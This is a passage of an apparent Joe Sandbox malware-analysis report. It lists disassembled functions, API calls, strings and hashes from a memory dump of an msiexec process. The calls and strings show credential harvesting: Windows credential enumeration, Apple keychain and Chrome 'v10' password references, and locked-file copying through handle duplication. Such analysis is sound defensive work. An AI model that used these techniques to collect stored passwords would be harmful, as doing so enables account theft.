                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                              Control-flow Graph

                                                              control_flow_graph 578 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 581 413f00-413f11 Process32NextW 578->581 582 413da5-413ded OpenProcess 581->582 583 413f17-413f24 CloseHandle 581->583 584 413eb0-413eb5 582->584 585 413df3-413e26 memset call 413f27 582->585 584->581 586 413eb7-413ebd 584->586 591 413e79-413e9d call 413959 call 413ca4 585->591 592 413e28-413e35 585->592 588 413ec8-413eda call 4099f4 586->588 589 413ebf-413ec6 free 586->589 593 413edb-413ee2 588->593 589->593 605 413ea2-413eae CloseHandle 591->605 596 413e61-413e68 592->596 597 413e37-413e44 GetModuleHandleW 592->597 598 413ee4 593->598 599 413ee7-413efe 593->599 596->591 602 413e6a-413e76 596->602 597->596 601 413e46-413e5c GetProcAddress 597->601 598->599 599->581 601->596 602->591 605->584
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                              • memset.MSVCRT ref: 00413D7F
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                              • memset.MSVCRT ref: 00413E07
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                              • free.MSVCRT ref: 00413EC1
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                              • API String ID: 1344430650-1740548384
                                                              • Opcode ID: 7d02fd8a141b21bce287ccd79cf3663acdf79a25f15b62318ca84dc4e74db171
                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                              • Opcode Fuzzy Hash: 7d02fd8a141b21bce287ccd79cf3663acdf79a25f15b62318ca84dc4e74db171
                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                              APIs
                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileFind$FirstNext
                                                              • String ID:
                                                              • API String ID: 1690352074-0
                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                              APIs
                                                              • memset.MSVCRT ref: 0041898C
                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: InfoSystemmemset
                                                              • String ID:
                                                              • API String ID: 3558857096-0
                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                              Control-flow Graph

control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 73 445685 21->73 74 4456b2-4456b5 call 40b1ab 21->74 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 78 445fae-445fb2 63->78 79 445d2b-445d3b 63->79 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 87 445884-44589d call 40a9b5 call 4087b3 68->87 249 445c77 69->249 70->69 88 445ba2-445bcf call 4099c6 call 445403 call 445389 70->88 142 445849 71->142 90 44568b-4456a4 call 40a9b5 call 4087b3 73->90 108 4456ba-4456c4 74->108 95 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 79->95 96 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 79->96 146 44589f 87->146 88->54 148 4456a9-4456b0 90->148 165 445d67-445d6c 95->165 166 445d71-445d83 call 445093 95->166 196 445e17 96->196 197 445e1e-445e25 96->197 122 4457f9 108->122 123 4456ca-4456d3 call 413cfa call 413d4c 108->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 139->140 140->23 142->56 146->67 148->74 148->90 154->108 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->78 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->78 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->78 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->207 264 4457cc-4457e5 call 4087b3 248->264 249->54 253->176 264->207 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                              APIs
                                                              • memset.MSVCRT ref: 004455C2
                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 0044570D
                                                              • memset.MSVCRT ref: 00445725
                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              • memset.MSVCRT ref: 0044573D
                                                              • memset.MSVCRT ref: 00445755
                                                              • memset.MSVCRT ref: 004458CB
                                                              • memset.MSVCRT ref: 004458E3
                                                              • memset.MSVCRT ref: 0044596E
                                                              • memset.MSVCRT ref: 00445A10
                                                              • memset.MSVCRT ref: 00445A28
                                                              • memset.MSVCRT ref: 00445AC6
                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              • memset.MSVCRT ref: 00445B52
                                                              • memset.MSVCRT ref: 00445B6A
                                                              • memset.MSVCRT ref: 00445C9B
                                                              • memset.MSVCRT ref: 00445CB3
                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                              • memset.MSVCRT ref: 00445B82
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                              • memset.MSVCRT ref: 00445986
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                              • API String ID: 2263259095-3798722523
                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                              • String ID: $/deleteregkey$/savelangfile
                                                              • API String ID: 2744995895-28296030
                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                              • memset.MSVCRT ref: 0040B756
                                                              • memset.MSVCRT ref: 0040B7F5
                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                              • memset.MSVCRT ref: 0040B851
                                                              • memset.MSVCRT ref: 0040B8CA
                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • memset.MSVCRT ref: 0040BB53
                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                              • String ID: chp$v10
                                                              • API String ID: 4290143792-2783969131
                                                              • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                              • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                              Control-flow Graph

                                                              control_flow_graph 505 4091b8-40921b memset call 40a6e6 call 444432 510 409520-409526 505->510 511 409221-40923b call 40b273 call 438552 505->511 515 409240-409248 511->515 516 409383-4093ab call 40b273 call 438552 515->516 517 40924e-409258 call 4251c4 515->517 528 4093b1 516->528 529 4094ff-40950b call 443d90 516->529 522 40937b-40937e call 424f26 517->522 523 40925e-409291 call 4253cf * 2 call 4253af * 2 517->523 522->516 523->522 553 409297-409299 523->553 531 4093d3-4093dd call 4251c4 528->531 529->510 539 40950d-409511 529->539 540 4093b3-4093cc call 4253cf * 2 531->540 541 4093df 531->541 539->510 543 409513-40951d call 408f2f 539->543 540->531 557 4093ce-4093d1 540->557 545 4094f7-4094fa call 424f26 541->545 543->510 545->529 553->522 554 40929f-4092a3 553->554 554->522 556 4092a9-4092ba 554->556 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->531 560 4093e4-4093fb call 4253af * 2 557->560 558->559 561 409333-409345 memcmp 559->561 562 4092e5-4092ec 559->562 560->545 570 409401-409403 560->570 561->522 565 409347-40935f memcpy 561->565 562->522 564 4092f2-409331 memcpy * 2 562->564 567 409363-409378 memcpy 564->567 565->567 567->522 570->545 571 409409-40941b memcmp 570->571 571->545 572 409421-409433 memcmp 571->572 573 4094a4-4094b6 memcmp 572->573 574 409435-40943c 572->574 573->545 576 4094b8-4094ed memcpy * 2 573->576 574->545 575 409442-4094a2 memcpy * 3 574->575 577 4094f4 575->577 576->577 577->545
                                                              APIs
                                                              • memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                              • String ID:
                                                              • API String ID: 3715365532-3916222277
                                                              • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                              • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                              • String ID: bhv
                                                              • API String ID: 4234240956-2689659898
                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                              Control-flow Graph

                                                              control_flow_graph 634 413f4f-413f52 635 413fa5 634->635 636 413f54-413f5a call 40a804 634->636 638 413f5f-413fa4 GetProcAddress * 5 636->638 638->635
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2941347001-70141382
                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                              Control-flow Graph

                                                              control_flow_graph 639 4466f4-44670e call 446904 GetModuleHandleA 642 446710-44671b 639->642 643 44672f-446732 639->643 642->643 644 44671d-446726 642->644 645 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 643->645 647 446747-44674b 644->647 648 446728-44672d 644->648 653 4467ac-4467b7 __setusermatherr 645->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 645->654 647->643 651 44674d-44674f 647->651 648->643 650 446734-44673b 648->650 650->643 655 44673d-446745 650->655 652 446755-446758 651->652 652->645 653->654 658 446810-446819 654->658 659 44681e-446825 654->659 655->652 660 4468d8-4468dd call 44693d 658->660 661 446827-446832 659->661 662 44686c-446870 659->662 665 446834-446838 661->665 666 44683a-44683e 661->666 663 446845-44684b 662->663 664 446872-446877 662->664 670 446853-446864 GetStartupInfoW 663->670 671 44684d-446851 663->671 664->662 665->661 665->666 666->663 668 446840-446842 666->668 668->663 672 446866-44686a 670->672 673 446879-44687b 670->673 671->668 671->670 674 44687c-446894 GetModuleHandleA call 41276d 672->674 673->674 677 446896-446897 exit 674->677 678 44689d-4468d6 _cexit 674->678 677->678 678->660
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
